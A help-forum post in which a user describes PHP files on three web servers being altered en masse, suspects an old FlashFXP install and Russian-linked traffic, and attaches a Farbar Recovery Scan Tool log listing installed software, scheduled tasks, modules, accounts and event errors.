Log-Analyse und Auswertung: FTPs Flash FXP Dateien Manipuliert (Windows 7)

26.03.2015, 14:38 #1
FTPs Flash FXP files manipulated

Hi all, I have 3 different websites. Yesterday I noticed that about 1 hour earlier a great many files, mainly those in the server's root directory, had been modified. Each file was extended with the contents of the file "welcher virus löst diese zeile aus.txt" (German: "which virus triggers this line.txt"). Only .php files were affected. It looks like a script did it: on 3 servers, everything within 2 seconds. The servers had secure passwords; the Flash FXP version in use was from 2003 (yes, I know, old). I can't be 100% sure where I downloaded the software back then, so it is conceivable that the software is infected. I downloaded Wireshark and tried to analyse the network traffic because I suspected that the program forwards the data. At first my suspicion was confirmed: in lines 17 and 18 of the file "logfile wireshark" an IP appears that geolocates to Russia, and it showed up after I started Flash FXP. I have now uninstalled Flash FXP, deleted it, downloaded the latest version from Chip and installed it into a different folder. Unfortunately the IP shows up again shortly after the restart. I have also done the following: a full scan with Avira and with Trend Micro PC-cillin, both without result. Then I also downloaded Malwarebytes; apart from it recommending the ICQ toolbar as unnecessary, nothing there either. > Then I started with your tools < everything went according to plan until the last TOOL. After it had *finished*, it said the computer might be infected with a rootkit. Attached are all the log files. Thanks in advance for the help!

Regards, Stefan

Code:
ATTFilter Additional scan result of Farbar Recovery Scan Tool (x86) Version: 11-03-2015 Ran by k at 2015-03-26 13:51:33 Running from C:\Users\k\Downloads\trojaner anleitung Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Avira Desktop (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859} AV: Trend Micro Internet Security (Enabled - Up to date) {F2F88E6A-3C7A-545F-268A-5D0BDD38EE06} AS: Avira Desktop (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Trend Micro Internet Security (Enabled - Up to date) {49996F8E-1A40-5BD1-1C3A-6679A6BFA4BB} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) ACDSee 4.0.1 Std Trial Version (HKLM\...\{5F7C2680-9431-48AD-8598-5B86B904EA61}) (Version: 4.00.0001 - ACD Systems Ltd) Adobe AIR (HKLM\...\Adobe AIR) (Version: 17.0.0.124 - Adobe Systems Incorporated) Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated) Adobe Flash Player 17 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 17.0.0.134 - Adobe Systems Incorporated) Adobe Photoshop CS2 (HKLM\...\Adobe Photoshop CS2 - {236BB7C4-4419-42FD-0407-1E257A25E34D}) (Version: 9.0 - Adobe Systems, Inc.) Adobe Reader XI (11.0.10) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated) Anti-Twin (Installation 14.03.2015) (HKLM\...\Anti-Twin 2015-03-14 16.21.58) (Version: - Joerg Rosenthal, Germany) Apple Application Support (32-Bit) (HKLM\...\{2FE00055-C4F3-4F7A-AEDD-E198D54CF12F}) (Version: 3.1.1 - Apple Inc.) 
Apple Mobile Device Support (HKLM\...\{28ED482A-56DB-47D9-8D9E-990FA8CD7D3D}) (Version: 8.1.0.18 - Apple Inc.) Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.18 - Atheros Communications Inc.) Avira (HKLM\...\{bd538030-07d4-4999-a525-7fafa2483f56}) (Version: 1.1.30.21727 - Avira Operations & Co. KG) Avira (Version: 1.1.30.21727 - Avira Operations & Co. KG) Hidden Avira Free Antivirus (HKLM\...\Avira AntiVir Desktop) (Version: 15.0.8.656 - Avira) Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.) Brother P-touch Address Book 1.0 (HKLM\...\InstallShield_{98E9B724-0E62-4812-B6CC-C6A228BBC562}) (Version: 1.0 - Brother Industries, Ltd.) Brother P-touch Address Book 1.0 (Version: 1.0 - Brother Industries, Ltd.) Hidden Brother P-touch Editor 4.2 (Version: 4.2 - Brother Industries, Ltd.) Hidden Brother P-touch Editor 5.1 (HKLM\...\{39270390-A851-4E4B-94A9-D5C468216ED3}) (Version: 5.1.0200 - Brother Industries, Ltd.) Brother P-touch Software (Version: 1.0.006 - Brother Industries, Ltd. ) Hidden Brother QL-Series User's Guide (HKLM\...\InstallShield_{7CCC6E23-0E35-480B-8F0C-8D06F882D5D3}) (Version: 1.0.001 - Brother Industries, Ltd.) Brother QL-Series User's Guide (Version: 1.0.001 - Brother Industries, Ltd.) 
Hidden Canon IJ Network Scan Utility (HKLM\...\Canon_IJ_Network_Scan_UTILITY) (Version: - ) Canon IJ Network Tool (HKLM\...\Canon_IJ_Network_UTILITY) (Version: - ) Canon MP Navigator EX 1.1 (HKLM\...\MP Navigator EX 1.1) (Version: - ) Canon MX7600 series (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX7600_series) (Version: - ) Canon My Printer (HKLM\...\CanonMyPrinter) (Version: - ) Canon Utilities Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version: - ) CCleaner (HKLM\...\CCleaner) (Version: 5.00 - Piriform) DivX-Setup (HKLM\...\DivX Setup) (Version: 2.7.0.31 - DivX, LLC) DJI driver version 1.0 (HKLM\...\{9A2C30EE-6E35-4479-B0E6-B1B47A54E8CD}_is1) (Version: 1.0 - DJI) DJI Phantom 2 Assistant version 2.00 (HKLM\...\{8E43DA79-9B6D-446F-86BD-E7D5A567319B}_is1) (Version: 2.00 - DJI) FlashFXP 5 (HKLM\...\FlashFXP 5) (Version: 5.1.0.3820 - OpenSight Software LLC) Google Chrome (HKLM\...\Google Chrome) (Version: 41.0.2272.101 - Google Inc.) Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden Hauppauge WinTV 7 (HKLM\...\Hauppauge WinTV 7) (Version: v7.0.29209 (CD 2.4) - Hauppauge Computer Works) ICQ7.5 (HKLM\...\{7578ADEA-D65F-4C89-A249-B1C88B6FFC20}) (Version: 7.5 - ICQ) iExplorer 2.2.1.3 (HKLM\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant, LLC) iFunbox (v2.7.2386.747), iFunbox DevTeam (HKLM\...\iFunbox_is1) (Version: v2.7.2386.747 - ) IncrediMail (HKLM\...\IncrediMail) (Version: 5.8.6.4332 - IncrediMail Ltd.) iTunes (HKLM\...\{B8032A6B-C4D0-4744-B75F-9DDCB56B5C6F}) (Version: 12.1.0.71 - Apple Inc.) 
Malwarebytes Anti-Malware Version 2.1.4.1018 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation) MaxTalk (HKLM\...\1133-9239-8439-9600-user) (Version: 2.4.5 - Sputnik Engineering AG) Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft Access database engine 2010 (German) (HKLM\...\{90140000-00D1-0407-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft Office 2000 SR-1 Disc 2 (HKLM\...\{00040407-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.3821 - Microsoft Corporation) Microsoft Office 2000 SR-1 Professional (HKLM\...\{00010407-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.3821 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Mozilla Firefox 36.0.4 (x86 de) (HKLM\...\Mozilla Firefox 36.0.4 (x86 de)) (Version: 36.0.4 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 34.0.5 - Mozilla) MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) NVIDIA 3D Vision Treiber 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation) NVIDIA Grafiktreiber 340.52 
(HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation) NVIDIA Update 10.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 10.4.0 - NVIDIA Corporation) OpenOffice 4.1.1 (HKLM\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation) PDF Architect 2 Create Module (Version: 2.1.6.19758 - pdfforge GmbH) Hidden PDF Architect 2 Edit Module (Version: 2.1.6.19758 - pdfforge GmbH) Hidden PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.0.0 - pdfforge) Personal Backup 4.1.0 (HKLM\...\Personal Backup_is1) (Version: - J. Rathlev) PGP Desktop (HKLM\...\{04A8595A-4B2F-4A20-BA5D-E6B371657FF8}) (Version: 10.0.2.13 - PGP Corporation) PowerCinema (HKLM\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 5.1.4410j - CyberLink Corp.) ProSafe Plus Utility (HKLM\...\InstallShield_{B98C06F7-F167-45AF-B612-F89DA39BB22F}) (Version: 2.2.37 - Ihr Firmenname) ProSafe Plus Utility (Version: 2.2.37 - Ihr Firmenname) Hidden Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5859 - Realtek Semiconductor Corp.) TeamViewer 10 (HKLM\...\TeamViewer) (Version: 10.0.36244 - TeamViewer) Trend Micro Internet Security (HKLM\...\{ABBD4BA8-6703-40D2-AB1E-5BB1F7DB49A4}) (Version: 8.0 - Trend Micro Inc.) Trend Micro Titanium (Version: 8.0 - Trend Micro Inc.) Hidden TrueCrypt (HKLM\...\TrueCrypt) (Version: 7.0a - TrueCrypt Foundation) tsWebEditor 1.8.5.2 (HKLM\...\tsWebEditor) (Version: - ) VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden WinPcap 4.1.3 (HKLM\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.) 
WinRAR 5.20 (32-Bit) (HKLM\...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH) Wireshark 1.12.4 (32-bit) (HKLM\...\Wireshark) (Version: 1.12.4 - The Wireshark developer community, hxxp://www.wireshark.org) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path CustomCLSID: 
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{28286AE2-3628-11D4-8168-0050DACFAE5F}\InprocServer32 -> No File CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{28286AE3-3628-11D4-8168-0050DACFAE5F}\InprocServer32 -> No File CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{4969CDC0-6307-11D4-8194-0050DACFAE5F}\InprocServer32 -> No File CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{4EDE09DD-0761-4ABF-8DAD-1444A02C54A1}\localserver32 -> C:\Program Files\Brother\Ptedit51\Ptedit51.exe (Brother Industries, Ltd.) CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{65105120-AB6A-11D4-81E0-0050DACFAE5F}\InprocServer32 -> No File CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{88053C33-35CC-11D1-91D6-0060081E8747}\InprocServer32 -> No File CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{88053C34-35CC-11D1-91D6-0060081E8747}\InprocServer32 -> C:\Windows\system32\DC265Ifr.ocx (FlashPoint Technology, Inc.) 
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{8F7B7699-FEA0-11D0-B136-0060976B8BBB}\InprocServer32 -> No File CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{8F7B769A-FEA0-11D0-B136-0060976B8BBB}\InprocServer32 -> C:\Windows\system32\DC265Ser.ocx (FlashPoint Technology, Inc.) CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{F68B9274-2DF3-11D1-91D6-0060081E8747}\InprocServer32 -> No File CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{F68B9275-2DF3-11D1-91D6-0060081E8747}\InprocServer32 -> C:\Windows\system32\DC265USB.ocx (FlashPoint Technology, Inc.) CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{FC17C3E0-A694-11D4-81DB-0050DACFAE5F}\InprocServer32 -> No File ==================== Restore Points ========================= 20-03-2015 14:57:07 Windows Update 22-03-2015 19:00:06 Windows-Sicherung 24-03-2015 21:17:55 Windows Update 25-03-2015 03:00:11 Windows Update 25-03-2015 19:04:15 Installiert ProSafe Plus Utility ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-14 03:04 - 2009-06-10 22:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) 
Task: {11E70B01-712E-4996-A5C7-3AA00682B89D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {1CA58498-0CF6-42ED-863B-3E08C85D6265} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-12-12] (Google Inc.) Task: {7D3C7871-A917-4EF0-82E8-5F0A96423051} - System32\Tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask => BthUdTask.exe Task: {BD717BC1-E200-41E5-A9DF-6F855CD32EAA} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-11-21] (Piriform Ltd) Task: {C5ED9FEB-3BC1-4270-ADD6-B1176EA5C4E0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-03-21] (Adobe Systems Incorporated) Task: {CDFEB96C-5BB8-44EB-A3DB-865E78AB49DD} - System32\Tasks\{9B52E0BA-337F-45FF-8109-F8F7612BC79C} => pcalua.exe -a D:\SInstall\SInstall.exe -d D:\ Task: {D21F6024-191F-4454-BBBC-09A650DA2549} - System32\Tasks\Microsoft\Windows\Application Experience\AitAgent => aitagent.exe Task: {D68D5789-81AB-4250-951E-93D7E0594AF4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-12-12] (Google Inc.) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============== 2014-12-12 17:26 - 2014-07-02 20:42 - 00107992 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax.dll 2014-12-15 09:20 - 2013-01-16 02:50 - 00039424 _____ () C:\Program Files\Trend Micro\AMSP\boost_date_time-vc110-mt-1_49.dll 2014-12-15 09:20 - 2014-07-01 11:19 - 00542720 _____ () C:\Program Files\Trend Micro\AMSP\sqlite3.dll 2014-12-15 09:20 - 2013-01-16 02:55 - 00049152 _____ () C:\Program Files\Trend Micro\AMSP\boost_thread-vc110-mt-1_49.dll 2014-12-15 09:20 - 2012-12-18 21:04 - 01098240 _____ () C:\Program Files\Trend Micro\AMSP\libprotobuf.dll 2014-12-15 09:20 - 2013-01-16 02:50 - 00016896 _____ () C:\Program Files\Trend Micro\AMSP\boost_system-vc110-mt-1_49.dll 2014-12-15 09:14 - 2014-07-20 20:04 - 00181432 _____ () C:\Program Files\Trend Micro\UniClient\plugins\LUADLL.dll 2015-01-20 22:35 - 2015-01-20 22:35 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2015-01-20 22:35 - 2015-01-20 22:35 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2014-12-12 14:50 - 2007-08-10 23:05 - 00290913 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLCapSvc.exe 2014-12-12 14:50 - 2007-08-10 23:05 - 00249959 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLCapEngine.dll 2014-12-12 14:50 - 2007-08-10 23:05 - 00032768 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLCapSvcps.dll 2014-12-12 18:43 - 2011-07-11 19:02 - 00018944 _____ () C:\Program Files\WinTV\TVServer\HauppaugeTVServerps.dll 2014-12-15 09:21 - 2014-07-20 20:04 - 00072192 _____ () C:\Program 
Files\Trend Micro\Titanium\plugin\Pt\boost_thread-vc110-mt-1_52.dll 2014-12-15 09:21 - 2014-07-20 20:04 - 00016896 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_system-vc110-mt-1_52.dll 2014-12-15 09:21 - 2014-07-20 20:04 - 00040960 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_date_time-vc110-mt-1_52.dll 2014-12-15 09:21 - 2014-07-20 20:04 - 00631808 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_regex-vc110-mt-1_52.dll 2014-12-12 14:49 - 2007-08-10 23:07 - 00262247 ____N () C:\Program Files\Cyberlink\Shared files\RichVideo.exe 2014-12-12 14:50 - 2007-08-10 23:05 - 00118879 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLSched.exe 2014-12-12 14:50 - 2007-08-10 23:05 - 00114785 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLSchMgr.dll 2014-12-12 14:50 - 2007-08-10 23:05 - 00339968 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLTinyDB.dll 2009-09-07 17:33 - 2009-09-07 17:33 - 00073728 _____ () C:\Program Files\IncrediMail\bin\ImAppRU.dll 2009-09-07 17:27 - 2009-09-07 17:27 - 00110592 _____ () C:\Program Files\IncrediMail\bin\ImComUtlU.dll 2014-09-06 11:42 - 2014-09-06 11:42 - 00095790 _____ () C:\Program Files\Wireshark\libgcc_s_sjlj-1.dll 2014-09-30 22:39 - 2014-09-30 22:39 - 00574464 _____ () C:\Program Files\Wireshark\libgcrypt-20.dll 2014-09-30 22:39 - 2014-09-30 22:39 - 00084480 _____ () C:\Program Files\Wireshark\libgpg-error-0.dll 2015-03-04 18:10 - 2015-03-04 18:10 - 00066560 _____ () C:\Program Files\Wireshark\zlib1.dll 2013-03-07 17:34 - 2013-03-07 17:34 - 00155450 _____ () C:\Program Files\Wireshark\libcares-2.dll 2014-09-06 21:56 - 2014-09-06 21:56 - 00999399 _____ () C:\Program Files\Wireshark\libgnutls-28.dll 2014-09-06 10:21 - 2014-09-06 10:21 - 00392622 _____ () C:\Program Files\Wireshark\libgmp-10.dll 2014-09-06 20:29 - 2014-09-06 20:29 - 00171776 _____ () C:\Program Files\Wireshark\libhogweed-2-4.dll 2014-09-06 20:29 - 2014-09-06 20:29 - 00185527 _____ () 
C:\Program Files\Wireshark\libnettle-4-6.dll 2014-09-06 20:42 - 2014-09-06 20:42 - 00221512 _____ () C:\Program Files\Wireshark\libp11-kit-0.dll 2014-09-05 16:37 - 2014-09-05 16:37 - 00030540 _____ () C:\Program Files\Wireshark\libffi-6.dll 2014-09-06 13:50 - 2014-09-06 13:50 - 00074988 _____ () C:\Program Files\Wireshark\libtasn1-6.dll 2011-06-27 20:49 - 2011-06-27 20:49 - 00708300 _____ () C:\Program Files\Wireshark\libsmi-2.dll 2013-07-19 18:35 - 2013-07-19 18:35 - 00331952 _____ () C:\Program Files\Wireshark\libGeoIP-1.dll 2014-03-31 21:55 - 2014-03-31 21:55 - 00198656 _____ () C:\Program Files\Wireshark\lua52.dll 2014-04-09 03:07 - 2014-04-09 03:07 - 00626410 _____ () C:\Program Files\Wireshark\libcairo-2.dll 2014-04-08 19:35 - 2014-04-08 19:35 - 00222985 _____ () C:\Program Files\Wireshark\libfontconfig-1.dll 2014-04-08 19:32 - 2014-04-08 19:32 - 00479222 _____ () C:\Program Files\Wireshark\libfreetype-6.dll 2014-04-08 19:11 - 2014-04-08 19:11 - 01150462 _____ () C:\Program Files\Wireshark\libxml2-2.dll 2014-04-08 20:00 - 2014-04-08 20:00 - 00607850 _____ () C:\Program Files\Wireshark\libpixman-1-0.dll 2014-04-08 19:01 - 2014-04-08 19:01 - 00174209 _____ () C:\Program Files\Wireshark\libpng15-15.dll 2014-04-09 01:31 - 2014-04-09 01:31 - 00256785 _____ () C:\Program Files\Wireshark\libjasper-1.dll 2014-04-08 20:16 - 2014-04-08 20:16 - 00196540 _____ () C:\Program Files\Wireshark\libjpeg-8.dll 2014-04-09 01:51 - 2014-04-09 01:51 - 00420397 _____ () C:\Program Files\Wireshark\libtiff-5.dll 2014-04-09 08:59 - 2014-04-09 08:59 - 00280211 _____ () C:\Program Files\Wireshark\libharfbuzz-0.dll 2014-05-12 06:45 - 2014-05-12 06:45 - 00065946 _____ () C:\Program Files\Wireshark\lib\gtk-2.0\2.10.0\engines\libwimp.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) 
==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) =============== (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\k\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.178.1 ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^AutoStart IR.lnk => C:\Windows\pss\AutoStart IR.lnk.CommonStartup MSCONFIG\startupreg: DivXMediaServer => C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe MSCONFIG\startupreg: DivXUpdate => "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW ==================== Accounts: ============================= Administrator (S-1-5-21-2895699136-3436441363-2783724240-500 - Administrator - Disabled) Gast (S-1-5-21-2895699136-3436441363-2783724240-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-2895699136-3436441363-2783724240-1002 - Limited - Enabled) k (S-1-5-21-2895699136-3436441363-2783724240-1001 - Administrator - Enabled) => C:\Users\k ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (03/26/2015 01:38:05 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". 
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (03/26/2015 01:38:04 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (03/26/2015 01:35:50 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (03/26/2015 01:35:45 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". 
